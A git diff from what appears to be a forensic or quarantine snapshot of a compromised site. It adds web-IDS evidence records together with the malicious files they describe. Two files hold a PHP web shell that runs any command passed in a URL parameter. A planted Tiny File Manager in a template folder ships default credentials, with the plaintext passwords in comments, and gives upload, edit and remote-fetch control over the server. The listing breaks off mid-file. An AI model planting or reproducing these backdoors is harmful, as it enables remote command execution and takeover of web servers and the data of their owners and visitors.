a/var/www/hosting/archline.hu/www/rce.php.json b/var/www/hosting/archline.hu/www/rce.php.json new file mode 100644 index 0000000..eedcebd --- /dev/null +++ b/var/www/hosting/archline.hu/www/rce.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/rce.php.json.evidence.json b/var/www/hosting/archline.hu/www/rce.php.json.evidence.json new file mode 100644 index 0000000..59d2f7d --- /dev/null +++ b/var/www/hosting/archline.hu/www/rce.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2931", + "log_excerpt": "[quarantine] www.archline.hu:rce.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/rce.php.json)", + "original_sha256": "76012be70b2b3a319db0048e2016bcd9dba30704a42bd3f2830004da716022b2", + "original_stat": { + "gid": 30037, + "mtime": 1783813036, + "size": 117, + "uid": 20043 + }, + "rel_path": "rce.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/sadboy.php.json b/var/www/hosting/archline.hu/www/sadboy.php.json new file mode 100644 index 0000000..eedcebd --- /dev/null +++ b/var/www/hosting/archline.hu/www/sadboy.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/sadboy.php.json.evidence.json b/var/www/hosting/archline.hu/www/sadboy.php.json.evidence.json new file mode 100644 index 0000000..f6db60d --- /dev/null +++ b/var/www/hosting/archline.hu/www/sadboy.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2880", + "log_excerpt": "[quarantine] www.archline.hu:sadboy.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/sadboy.php.json)", + "original_sha256": "76012be70b2b3a319db0048e2016bcd9dba30704a42bd3f2830004da716022b2", + "original_stat": { + "gid": 30037, + "mtime": 1783813028, + "size": 117, + "uid": 20043 + }, + "rel_path": "sadboy.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/shadow.php.json b/var/www/hosting/archline.hu/www/shadow.php.json new file mode 100644 index 0000000..d567bb7 --- /dev/null +++ b/var/www/hosting/archline.hu/www/shadow.php.json @@ -0,0 +1 @@ +';if(isset($_GET['cmd'])){echo'
';system($_GET['cmd']);echo'
';}echo'';?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/shadow.php.json.evidence.json b/var/www/hosting/archline.hu/www/shadow.php.json.evidence.json new file mode 100644 index 0000000..82370b1 --- /dev/null +++ b/var/www/hosting/archline.hu/www/shadow.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2901", + "log_excerpt": "[quarantine] www.archline.hu:shadow.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/shadow.php.json)", + "original_sha256": "20a80c4b4cd3686826f34f4715c481f7bb316cc9c6980c212737a5ca767230bd", + "original_stat": { + "gid": 30037, + "mtime": 1783805288, + "size": 140, + "uid": 20043 + }, + "rel_path": "shadow.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/amwhwyys.php.json b/var/www/hosting/archline.hu/www/templates/amwhwyys.php.json new file mode 100644 index 0000000..982bc2b --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/amwhwyys.php.json @@ -0,0 +1 @@ +';if(isset($_GET['cmd'])){echo'
';system($_GET['cmd']);echo'
';}echo'';?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/templates/amwhwyys.php.json.evidence.json b/var/www/hosting/archline.hu/www/templates/amwhwyys.php.json.evidence.json new file mode 100644 index 0000000..544f01a --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/amwhwyys.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2950", + "log_excerpt": "[quarantine] www.archline.hu:templates/amwhwyys.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/templates/amwhwyys.php.json)", + "original_sha256": "5f9fadd5d78ebe33acaa6f95602ea8b6ba716fe64dac17a20c259ecd32f2dacb", + "original_stat": { + "gid": 30037, + "mtime": 1784057815, + "size": 146, + "uid": 20043 + }, + "rel_path": "templates/amwhwyys.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/templates/category/tiny.php b/var/www/hosting/archline.hu/www/templates/category/tiny.php new file mode 100644 index 0000000..0cc65e3 --- /dev/null +++ b/var/www/hosting/archline.hu/www/templates/category/tiny.php @@ -0,0 +1,4300 @@ + 'Password', 'Username2' => 'Password2', ...) +// Generate secure password hash - https://tinyfilemanager.github.io/docs/pwd.html +$auth_users = array( + 'admin' => '$2y$10$j9Ci5ygFG6GYwpdHpcjrWOayhFIXR5GwblqewcrxzaZbQoXXpTg2a', //admin@123 + 'user' => '$2y$10$I1Adl6svIO7vVeVaQXebgesL7qOUC9tOGTnSQYEG1fNCelFLEti5i' //12345 +); + +// Readonly users +// e.g. array('users', 'guest', ...) +$readonly_users = array( + 'user' +); + +// Global readonly, including when auth is not being used +$global_readonly = false; + +// user specific directories +// array('Username' => 'Directory path', 'Username2' => 'Directory path', ...) +$directories_users = array(); + +// Enable highlight.js (https://highlightjs.org/) on view's page +$use_highlightjs = true; + +// highlight.js style +// for dark theme use 'ir-black' +$highlightjs_style = 'vs'; + +// Enable ace.js (https://ace.c9.io/) on view's page +$edit_files = true; + +// Default timezone for date() and time() +// Doc - http://php.net/manual/en/timezones.php +$default_timezone = 'Etc/UTC'; // UTC + +// Root path for file manager +// use absolute path of directory i.e: '/var/www/folder' or $_SERVER['DOCUMENT_ROOT'].'/folder' +$root_path = $_SERVER['DOCUMENT_ROOT']; + +// Root url for links in file manager.Relative to $http_host. Variants: '', 'path/to/subfolder' +// Will not working if $root_path will be outside of server document root +$root_url = ''; + +// Server hostname. Can set manually if wrong +// $_SERVER['HTTP_HOST'].'/folder' +$http_host = $_SERVER['HTTP_HOST']; + +// input encoding for iconv +$iconv_input_encoding = 'UTF-8'; + +// date() format for file modification date +// Doc - https://www.php.net/manual/en/function.date.php +$datetime_format = 'm/d/Y g:i A'; + +// Path display mode when viewing file information +// 'full' => show full path +// 'relative' => show path relative to root_path +// 'host' => show path on the host +$path_display_mode = 'full'; + +// Allowed file extensions for create and rename files +// e.g. 'txt,html,css,js' +$allowed_file_extensions = ''; + +// Allowed file extensions for upload files +// e.g. 'gif,png,jpg,html,txt' +$allowed_upload_extensions = ''; + +// Favicon path. This can be either a full url to an .PNG image, or a path based on the document root. +// full path, e.g http://example.com/favicon.png +// local path, e.g images/icons/favicon.png +$favicon_path = ''; + +// Files and folders to excluded from listing +// e.g. array('myfile.html', 'personal-folder', '*.php', ...) +$exclude_items = array(); + +// Online office Docs Viewer +// Availabe rules are 'google', 'microsoft' or false +// Google => View documents using Google Docs Viewer +// Microsoft => View documents using Microsoft Web Apps Viewer +// false => disable online doc viewer +$online_viewer = 'google'; + +// Sticky Nav bar +// true => enable sticky header +// false => disable sticky header +$sticky_navbar = true; + +// Maximum file upload size +// Increase the following values in php.ini to work properly +// memory_limit, upload_max_filesize, post_max_size +$max_upload_size_bytes = 5000000000; // size 5,000,000,000 bytes (~5GB) + +// chunk size used for upload +// eg. decrease to 1MB if nginx reports problem 413 entity too large +$upload_chunk_size_bytes = 2000000; // chunk size 2,000,000 bytes (~2MB) + +// Possible rules are 'OFF', 'AND' or 'OR' +// OFF => Don't check connection IP, defaults to OFF +// AND => Connection must be on the whitelist, and not on the blacklist +// OR => Connection must be on the whitelist, or not on the blacklist +$ip_ruleset = 'OFF'; + +// Should users be notified of their block? +$ip_silent = true; + +// IP-addresses, both ipv4 and ipv6 +$ip_whitelist = array( + '127.0.0.1', // local ipv4 + '::1' // local ipv6 +); + +// IP-addresses, both ipv4 and ipv6 +$ip_blacklist = array( + '0.0.0.0', // non-routable meta ipv4 + '::' // non-routable meta ipv6 +); + +// if User has the external config file, try to use it to override the default config above [config.php] +// sample config - https://tinyfilemanager.github.io/config-sample.txt +$config_file = __DIR__.'/config.php'; +if (is_readable($config_file)) { + @include($config_file); +} + +// External CDN resources that can be used in the HTML (replace for GDPR compliance) +$external = array( + 'css-bootstrap' => '', + 'css-dropzone' => '', + 'css-font-awesome' => '', + 'css-highlightjs' => '', + 'js-ace' => '', + 'js-bootstrap' => '', + 'js-dropzone' => '', + 'js-jquery' => '', + 'js-jquery-datatables' => '', + 'js-highlightjs' => '', + 'pre-jsdelivr' => '', + 'pre-cloudflare' => '' +); + +// --- EDIT BELOW CAREFULLY OR DO NOT EDIT AT ALL --- + +// max upload file size +define('MAX_UPLOAD_SIZE', $max_upload_size_bytes); + +// upload chunk size +define('UPLOAD_CHUNK_SIZE', $upload_chunk_size_bytes); + +// private key and session name to store to the session +if ( !defined( 'FM_SESSION_ID')) { + define('FM_SESSION_ID', 'filemanager'); +} + +// Configuration +$cfg = new FM_Config(); + +// Default language +$lang = isset($cfg->data['lang']) ? $cfg->data['lang'] : 'en'; + +// Show or hide files and folders that starts with a dot +$show_hidden_files = isset($cfg->data['show_hidden']) ? $cfg->data['show_hidden'] : true; + +// PHP error reporting - false = Turns off Errors, true = Turns on Errors +$report_errors = isset($cfg->data['error_reporting']) ? $cfg->data['error_reporting'] : true; + +// Hide Permissions and Owner cols in file-listing +$hide_Cols = isset($cfg->data['hide_Cols']) ? $cfg->data['hide_Cols'] : true; + +// Theme +$theme = isset($cfg->data['theme']) ? $cfg->data['theme'] : 'light'; + +define('FM_THEME', $theme); + +//available languages +$lang_list = array( + 'en' => 'English' +); + +if ($report_errors == true) { + @ini_set('error_reporting', E_ALL); + @ini_set('display_errors', 1); +} else { + @ini_set('error_reporting', E_ALL); + @ini_set('display_errors', 0); +} + +// if fm included +if (defined('FM_EMBED')) { + $use_auth = false; + $sticky_navbar = false; +} else { + @set_time_limit(600); + + date_default_timezone_set($default_timezone); + + ini_set('default_charset', 'UTF-8'); + if (version_compare(PHP_VERSION, '5.6.0', '<') && function_exists('mb_internal_encoding')) { + mb_internal_encoding('UTF-8'); + } + if (function_exists('mb_regex_encoding')) { + mb_regex_encoding('UTF-8'); + } + + session_cache_limiter('nocache'); // Prevent logout issue after page was cached + session_name(FM_SESSION_ID ); + function session_error_handling_function($code, $msg, $file, $line) { + // Permission denied for default session, try to create a new one + if ($code == 2) { + session_abort(); + session_id(session_create_id()); + @session_start(); + } + } + set_error_handler('session_error_handling_function'); + session_start(); + restore_error_handler(); +} + +//Generating CSRF Token +if (empty($_SESSION['token'])) { + if (function_exists('random_bytes')) { + $_SESSION['token'] = bin2hex(random_bytes(32)); + } else { + $_SESSION['token'] = bin2hex(openssl_random_pseudo_bytes(32)); + } +} + +if (empty($auth_users)) { + $use_auth = false; +} + +$is_https = isset($_SERVER['HTTPS']) && ($_SERVER['HTTPS'] == 'on' || $_SERVER['HTTPS'] == 1) + || isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https'; + +// update $root_url based on user specific directories +if (isset($_SESSION[FM_SESSION_ID]['logged']) && !empty($directories_users[$_SESSION[FM_SESSION_ID]['logged']])) { + $wd = fm_clean_path(dirname($_SERVER['PHP_SELF'])); + $root_url = $root_url.$wd.DIRECTORY_SEPARATOR.$directories_users[$_SESSION[FM_SESSION_ID]['logged']]; +} +// clean $root_url +$root_url = fm_clean_path($root_url); + +// abs path for site +defined('FM_ROOT_URL') || define('FM_ROOT_URL', ($is_https ? 'https' : 'http') . '://' . $http_host . (!empty($root_url) ? '/' . $root_url : '')); +defined('FM_SELF_URL') || define('FM_SELF_URL', ($is_https ? 'https' : 'http') . '://' . $http_host . $_SERVER['PHP_SELF']); + +// logout +if (isset($_GET['logout'])) { + unset($_SESSION[FM_SESSION_ID]['logged']); + unset( $_SESSION['token']); + fm_redirect(FM_SELF_URL); +} + +// Validate connection IP +if ($ip_ruleset != 'OFF') { + function getClientIP() { + if (array_key_exists('HTTP_CF_CONNECTING_IP', $_SERVER)) { + return $_SERVER["HTTP_CF_CONNECTING_IP"]; + }else if (array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER)) { + return $_SERVER["HTTP_X_FORWARDED_FOR"]; + }else if (array_key_exists('REMOTE_ADDR', $_SERVER)) { + return $_SERVER['REMOTE_ADDR']; + }else if (array_key_exists('HTTP_CLIENT_IP', $_SERVER)) { + return $_SERVER['HTTP_CLIENT_IP']; + } + return ''; + } + + $clientIp = getClientIP(); + $proceed = false; + $whitelisted = in_array($clientIp, $ip_whitelist); + $blacklisted = in_array($clientIp, $ip_blacklist); + + if($ip_ruleset == 'AND'){ + if($whitelisted == true && $blacklisted == false){ + $proceed = true; + } + } else + if($ip_ruleset == 'OR'){ + if($whitelisted == true || $blacklisted == false){ + $proceed = true; + } + } + + if($proceed == false){ + trigger_error('User connection denied from: ' . $clientIp, E_USER_WARNING); + + if($ip_silent == false){ + fm_set_msg(lng('Access denied. IP restriction applicable'), 'error'); + fm_show_header_login(); + fm_show_message(); + } + exit(); + } +} + +// Checking if the user is logged in or not. If not, it will show the login form. +if ($use_auth) { + if (isset($_SESSION[FM_SESSION_ID]['logged'], $auth_users[$_SESSION[FM_SESSION_ID]['logged']])) { + // Logged + } elseif (isset($_POST['fm_usr'], $_POST['fm_pwd'], $_POST['token'])) { + // Logging In + sleep(1); + if(function_exists('password_verify')) { + if (isset($auth_users[$_POST['fm_usr']]) && isset($_POST['fm_pwd']) && password_verify($_POST['fm_pwd'], $auth_users[$_POST['fm_usr']]) && verifyToken($_POST['token'])) { + $_SESSION[FM_SESSION_ID]['logged'] = $_POST['fm_usr']; + fm_set_msg(lng('You are logged in')); + fm_redirect(FM_SELF_URL); + } else { + unset($_SESSION[FM_SESSION_ID]['logged']); + fm_set_msg(lng('Login failed. Invalid username or password'), 'error'); + fm_redirect(FM_SELF_URL); + } + } else { + fm_set_msg(lng('password_hash not supported, Upgrade PHP version'), 'error');; + } + } else { + // Form + unset($_SESSION[FM_SESSION_ID]['logged']); + fm_show_header_login(); + ?> +
+
+
+
+
+
+ +
+
+ +
+
+
+
+ + ".lng('Root path')." \"{$root_path}\" ".lng('not found!')." "; + exit; +} + +defined('FM_SHOW_HIDDEN') || define('FM_SHOW_HIDDEN', $show_hidden_files); +defined('FM_ROOT_PATH') || define('FM_ROOT_PATH', $root_path); +defined('FM_LANG') || define('FM_LANG', $lang); +defined('FM_FILE_EXTENSION') || define('FM_FILE_EXTENSION', $allowed_file_extensions); +defined('FM_UPLOAD_EXTENSION') || define('FM_UPLOAD_EXTENSION', $allowed_upload_extensions); +defined('FM_EXCLUDE_ITEMS') || define('FM_EXCLUDE_ITEMS', (version_compare(PHP_VERSION, '7.0.0', '<') ? serialize($exclude_items) : $exclude_items)); +defined('FM_DOC_VIEWER') || define('FM_DOC_VIEWER', $online_viewer); +define('FM_READONLY', $global_readonly || ($use_auth && !empty($readonly_users) && isset($_SESSION[FM_SESSION_ID]['logged']) && in_array($_SESSION[FM_SESSION_ID]['logged'], $readonly_users))); +define('FM_IS_WIN', DIRECTORY_SEPARATOR == '\\'); + +// always use ?p= +if (!isset($_GET['p']) && empty($_FILES)) { + fm_redirect(FM_SELF_URL . '?p='); +} + +// get path +$p = isset($_GET['p']) ? $_GET['p'] : (isset($_POST['p']) ? $_POST['p'] : ''); + +// clean path +$p = fm_clean_path($p); + +// for ajax request - save +$input = file_get_contents('php://input'); +$_POST = (strpos($input, 'ajax') != FALSE && strpos($input, 'save') != FALSE) ? json_decode($input, true) : $_POST; + +// instead globals vars +define('FM_PATH', $p); +define('FM_USE_AUTH', $use_auth); +define('FM_EDIT_FILE', $edit_files); +defined('FM_ICONV_INPUT_ENC') || define('FM_ICONV_INPUT_ENC', $iconv_input_encoding); +defined('FM_USE_HIGHLIGHTJS') || define('FM_USE_HIGHLIGHTJS', $use_highlightjs); +defined('FM_HIGHLIGHTJS_STYLE') || define('FM_HIGHLIGHTJS_STYLE', $highlightjs_style); +defined('FM_DATETIME_FORMAT') || define('FM_DATETIME_FORMAT', $datetime_format); + +unset($p, $use_auth, $iconv_input_encoding, $use_highlightjs, $highlightjs_style); + +/*************************** ACTIONS ***************************/ + +// Handle all AJAX Request +if ((isset($_SESSION[FM_SESSION_ID]['logged'], $auth_users[$_SESSION[FM_SESSION_ID]['logged']]) || !FM_USE_AUTH) && isset($_POST['ajax'], $_POST['token']) && !FM_READONLY) { + if(!verifyToken($_POST['token'])) { + header('HTTP/1.0 401 Unauthorized'); + die("Invalid Token."); + } + + //search : get list of files from the current folder + if(isset($_POST['type']) && $_POST['type']=="search") { + $dir = $_POST['path'] == "." ? '': $_POST['path']; + $response = scan(fm_clean_path($dir), $_POST['content']); + echo json_encode($response); + exit(); + } + + // save editor file + if (isset($_POST['type']) && $_POST['type'] == "save") { + // get current path + $path = FM_ROOT_PATH; + if (FM_PATH != '') { + $path .= '/' . FM_PATH; + } + // check path + if (!is_dir($path)) { + fm_redirect(FM_SELF_URL . '?p='); + } + $file = $_GET['edit']; + $file = fm_clean_path($file); + $file = str_replace('/', '', $file); + if ($file == '' || !is_file($path . '/' . $file)) { + fm_set_msg(lng('File not found'), 'error'); + $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); + } + header('X-XSS-Protection:0'); + $file_path = $path . '/' . $file; + + $writedata = $_POST['content']; + $fd = fopen($file_path, "w"); + $write_results = @fwrite($fd, $writedata); + fclose($fd); + if ($write_results === false){ + header("HTTP/1.1 500 Internal Server Error"); + die("Could Not Write File! - Check Permissions / Ownership"); + } + die(true); + } + + // backup files + if (isset($_POST['type']) && $_POST['type'] == "backup" && !empty($_POST['file'])) { + $fileName = fm_clean_path($_POST['file']); + $fullPath = FM_ROOT_PATH . '/'; + if (!empty($_POST['path'])) { + $relativeDirPath = fm_clean_path($_POST['path']); + $fullPath .= "{$relativeDirPath}/"; + } + $date = date("dMy-His"); + $newFileName = "{$fileName}-{$date}.bak"; + $fullyQualifiedFileName = $fullPath . $fileName; + try { + if (!file_exists($fullyQualifiedFileName)) { + throw new Exception("File {$fileName} not found"); + } + if (copy($fullyQualifiedFileName, $fullPath . $newFileName)) { + echo "Backup {$newFileName} created"; + } else { + throw new Exception("Could not copy file {$fileName}"); + } + } catch (Exception $e) { + echo $e->getMessage(); + } + } + + // Save Config + if (isset($_POST['type']) && $_POST['type'] == "settings") { + global $cfg, $lang, $report_errors, $show_hidden_files, $lang_list, $hide_Cols, $theme; + $newLng = $_POST['js-language']; + fm_get_translations([]); + if (!array_key_exists($newLng, $lang_list)) { + $newLng = 'en'; + } + + $erp = isset($_POST['js-error-report']) && $_POST['js-error-report'] == "true" ? true : false; + $shf = isset($_POST['js-show-hidden']) && $_POST['js-show-hidden'] == "true" ? true : false; + $hco = isset($_POST['js-hide-cols']) && $_POST['js-hide-cols'] == "true" ? true : false; + $te3 = $_POST['js-theme-3']; + + if ($cfg->data['lang'] != $newLng) { + $cfg->data['lang'] = $newLng; + $lang = $newLng; + } + if ($cfg->data['error_reporting'] != $erp) { + $cfg->data['error_reporting'] = $erp; + $report_errors = $erp; + } + if ($cfg->data['show_hidden'] != $shf) { + $cfg->data['show_hidden'] = $shf; + $show_hidden_files = $shf; + } + if ($cfg->data['show_hidden'] != $shf) { + $cfg->data['show_hidden'] = $shf; + $show_hidden_files = $shf; + } + if ($cfg->data['hide_Cols'] != $hco) { + $cfg->data['hide_Cols'] = $hco; + $hide_Cols = $hco; + } + if ($cfg->data['theme'] != $te3) { + $cfg->data['theme'] = $te3; + $theme = $te3; + } + $cfg->save(); + echo true; + } + + // new password hash + if (isset($_POST['type']) && $_POST['type'] == "pwdhash") { + $res = isset($_POST['inputPassword2']) && !empty($_POST['inputPassword2']) ? password_hash($_POST['inputPassword2'], PASSWORD_DEFAULT) : ''; + echo $res; + } + + //upload using url + if(isset($_POST['type']) && $_POST['type'] == "upload" && !empty($_REQUEST["uploadurl"])) { + $path = FM_ROOT_PATH; + if (FM_PATH != '') { + $path .= '/' . FM_PATH; + } + + function event_callback ($message) { + global $callback; + echo json_encode($message); + } + + function get_file_path () { + global $path, $fileinfo, $temp_file; + return $path."/".basename($fileinfo->name); + } + + $url = !empty($_REQUEST["uploadurl"]) && preg_match("|^http(s)?://.+$|", stripslashes($_REQUEST["uploadurl"])) ? stripslashes($_REQUEST["uploadurl"]) : null; + + //prevent 127.* domain and known ports + $domain = parse_url($url, PHP_URL_HOST); + $port = parse_url($url, PHP_URL_PORT); + $knownPorts = [22, 23, 25, 3306]; + + if (preg_match("/^localhost$|^127(?:\.[0-9]+){0,2}\.[0-9]+$|^(?:0*\:)*?:?0*1$/i", $domain) || in_array($port, $knownPorts)) { + $err = array("message" => "URL is not allowed"); + event_callback(array("fail" => $err)); + exit(); + } + + $use_curl = false; + $temp_file = tempnam(sys_get_temp_dir(), "upload-"); + $fileinfo = new stdClass(); + $fileinfo->name = trim(basename($url), ".\x00..\x20"); + + $allowed = (FM_UPLOAD_EXTENSION) ? explode(',', FM_UPLOAD_EXTENSION) : false; + $ext = strtolower(pathinfo($fileinfo->name, PATHINFO_EXTENSION)); + $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; + + $err = false; + + if(!$isFileAllowed) { + $err = array("message" => "File extension is not allowed"); + event_callback(array("fail" => $err)); + exit(); + } + + if (!$url) { + $success = false; + } else if ($use_curl) { + @$fp = fopen($temp_file, "w"); + @$ch = curl_init($url); + curl_setopt($ch, CURLOPT_NOPROGRESS, false ); + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); + curl_setopt($ch, CURLOPT_FILE, $fp); + @$success = curl_exec($ch); + $curl_info = curl_getinfo($ch); + if (!$success) { + $err = array("message" => curl_error($ch)); + } + @curl_close($ch); + fclose($fp); + $fileinfo->size = $curl_info["size_download"]; + $fileinfo->type = $curl_info["content_type"]; + } else { + $ctx = stream_context_create(); + @$success = copy($url, $temp_file, $ctx); + if (!$success) { + $err = error_get_last(); + } + } + + if ($success) { + $success = rename($temp_file, strtok(get_file_path(), '?')); + } + + if ($success) { + event_callback(array("done" => $fileinfo)); + } else { + unlink($temp_file); + if (!$err) { + $err = array("message" => "Invalid url parameter"); + } + event_callback(array("fail" => $err)); + } + } + exit(); +} + +// Delete file / folder +if (isset($_GET['del'], $_POST['token']) && !FM_READONLY) { + $del = str_replace( '/', '', fm_clean_path( $_GET['del'] ) ); + if ($del != '' && $del != '..' && $del != '.' && verifyToken($_POST['token'])) { + $path = FM_ROOT_PATH; + if (FM_PATH != '') { + $path .= '/' . FM_PATH; + } + $is_dir = is_dir($path . '/' . $del); + if (fm_rdelete($path . '/' . $del)) { + $msg = $is_dir ? lng('Folder').' %s '.lng('Deleted') : lng('File').' %s '.lng('Deleted'); + fm_set_msg(sprintf($msg, fm_enc($del))); + } else { + $msg = $is_dir ? lng('Folder').' %s '.lng('not deleted') : lng('File').' %s '.lng('not deleted'); + fm_set_msg(sprintf($msg, fm_enc($del)), 'error'); + } + } else { + fm_set_msg(lng('Invalid file or folder name'), 'error'); + } + $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); +} + +// Create a new file/folder +if (isset($_POST['newfilename'], $_POST['newfile'], $_POST['token']) && !FM_READONLY) { + $type = urldecode($_POST['newfile']); + $new = str_replace( '/', '', fm_clean_path( strip_tags( $_POST['newfilename'] ) ) ); + if (fm_isvalid_filename($new) && $new != '' && $new != '..' && $new != '.' && verifyToken($_POST['token'])) { + $path = FM_ROOT_PATH; + if (FM_PATH != '') { + $path .= '/' . FM_PATH; + } + if ($type == "file") { + if (!file_exists($path . '/' . $new)) { + if(fm_is_valid_ext($new)) { + @fopen($path . '/' . $new, 'w') or die('Cannot open file: ' . $new); + fm_set_msg(sprintf(lng('File').' %s '.lng('Created'), fm_enc($new))); + } else { + fm_set_msg(lng('File extension is not allowed'), 'error'); + } + } else { + fm_set_msg(sprintf(lng('File').' %s '.lng('already exists'), fm_enc($new)), 'alert'); + } + } else { + if (fm_mkdir($path . '/' . $new, false) === true) { + fm_set_msg(sprintf(lng('Folder').' %s '.lng('Created'), $new)); + } elseif (fm_mkdir($path . '/' . $new, false) === $path . '/' . $new) { + fm_set_msg(sprintf(lng('Folder').' %s '.lng('already exists'), fm_enc($new)), 'alert'); + } else { + fm_set_msg(sprintf(lng('Folder').' %s '.lng('not created'), fm_enc($new)), 'error'); + } + } + } else { + fm_set_msg(lng('Invalid characters in file or folder name'), 'error'); + } + $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); +} + +// Copy folder / file +if (isset($_GET['copy'], $_GET['finish']) && !FM_READONLY) { + // from + $copy = urldecode($_GET['copy']); + $copy = fm_clean_path($copy); + // empty path + if ($copy == '') { + fm_set_msg(lng('Source path not defined'), 'error'); + $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); + } + // abs path from + $from = FM_ROOT_PATH . '/' . $copy; + // abs path to + $dest = FM_ROOT_PATH; + if (FM_PATH != '') { + $dest .= '/' . FM_PATH; + } + $dest .= '/' . basename($from); + // move? + $move = isset($_GET['move']); + $move = fm_clean_path(urldecode($move)); + // copy/move/duplicate + if ($from != $dest) { + $msg_from = trim(FM_PATH . '/' . basename($from), '/'); + if ($move) { // Move and to != from so just perform move + $rename = fm_rename($from, $dest); + if ($rename) { + fm_set_msg(sprintf(lng('Moved from').' %s '.lng('to').' %s', fm_enc($copy), fm_enc($msg_from))); + } elseif ($rename === null) { + fm_set_msg(lng('File or folder with this path already exists'), 'alert'); + } else { + fm_set_msg(sprintf(lng('Error while moving from').' %s '.lng('to').' %s', fm_enc($copy), fm_enc($msg_from)), 'error'); + } + } else { // Not move and to != from so copy with original name + if (fm_rcopy($from, $dest)) { + fm_set_msg(sprintf(lng('Copied from').' %s '.lng('to').' %s', fm_enc($copy), fm_enc($msg_from))); + } else { + fm_set_msg(sprintf(lng('Error while copying from').' %s '.lng('to').' %s', fm_enc($copy), fm_enc($msg_from)), 'error'); + } + } + } else { + if (!$move){ //Not move and to = from so duplicate + $msg_from = trim(FM_PATH . '/' . basename($from), '/'); + $fn_parts = pathinfo($from); + $extension_suffix = ''; + if(!is_dir($from)){ + $extension_suffix = '.'.$fn_parts['extension']; + } + //Create new name for duplicate + $fn_duplicate = $fn_parts['dirname'].'/'.$fn_parts['filename'].'-'.date('YmdHis').$extension_suffix; + $loop_count = 0; + $max_loop = 1000; + // Check if a file with the duplicate name already exists, if so, make new name (edge case...) + while(file_exists($fn_duplicate) & $loop_count < $max_loop){ + $fn_parts = pathinfo($fn_duplicate); + $fn_duplicate = $fn_parts['dirname'].'/'.$fn_parts['filename'].'-copy'.$extension_suffix; + $loop_count++; + } + if (fm_rcopy($from, $fn_duplicate, False)) { + fm_set_msg(sprintf('Copied from %s to %s', fm_enc($copy), fm_enc($fn_duplicate))); + } else { + fm_set_msg(sprintf('Error while copying from %s to %s', fm_enc($copy), fm_enc($fn_duplicate)), 'error'); + } + } + else{ + fm_set_msg(lng('Paths must be not equal'), 'alert'); + } + } + $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); +} + +// Mass copy files/ folders +if (isset($_POST['file'], $_POST['copy_to'], $_POST['finish'], $_POST['token']) && !FM_READONLY) { + + if(!verifyToken($_POST['token'])) { + fm_set_msg(lng('Invalid Token.'), 'error'); + } + + // from + $path = FM_ROOT_PATH; + if (FM_PATH != '') { + $path .= '/' . FM_PATH; + } + // to + $copy_to_path = FM_ROOT_PATH; + $copy_to = fm_clean_path($_POST['copy_to']); + if ($copy_to != '') { + $copy_to_path .= '/' . $copy_to; + } + if ($path == $copy_to_path) { + fm_set_msg(lng('Paths must be not equal'), 'alert'); + $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); + } + if (!is_dir($copy_to_path)) { + if (!fm_mkdir($copy_to_path, true)) { + fm_set_msg('Unable to create destination folder', 'error'); + $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); + } + } + // move? + $move = isset($_POST['move']); + // copy/move + $errors = 0; + $files = $_POST['file']; + if (is_array($files) && count($files)) { + foreach ($files as $f) { + if ($f != '') { + $f = fm_clean_path($f); + // abs path from + $from = $path . '/' . $f; + // abs path to + $dest = $copy_to_path . '/' . $f; + // do + if ($move) { + $rename = fm_rename($from, $dest); + if ($rename === false) { + $errors++; + } + } else { + if (!fm_rcopy($from, $dest)) { + $errors++; + } + } + } + } + if ($errors == 0) { + $msg = $move ? 'Selected files and folders moved' : 'Selected files and folders copied'; + fm_set_msg($msg); + } else { + $msg = $move ? 'Error while moving items' : 'Error while copying items'; + fm_set_msg($msg, 'error'); + } + } else { + fm_set_msg(lng('Nothing selected'), 'alert'); + } + $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); +} + +// Rename +if (isset($_POST['rename_from'], $_POST['rename_to'], $_POST['token']) && !FM_READONLY) { + if(!verifyToken($_POST['token'])) { + fm_set_msg("Invalid Token.", 'error'); + } + // old name + $old = urldecode($_POST['rename_from']); + $old = fm_clean_path($old); + $old = str_replace('/', '', $old); + // new name + $new = urldecode($_POST['rename_to']); + $new = fm_clean_path(strip_tags($new)); + $new = str_replace('/', '', $new); + // path + $path = FM_ROOT_PATH; + if (FM_PATH != '') { + $path .= '/' . FM_PATH; + } + // rename 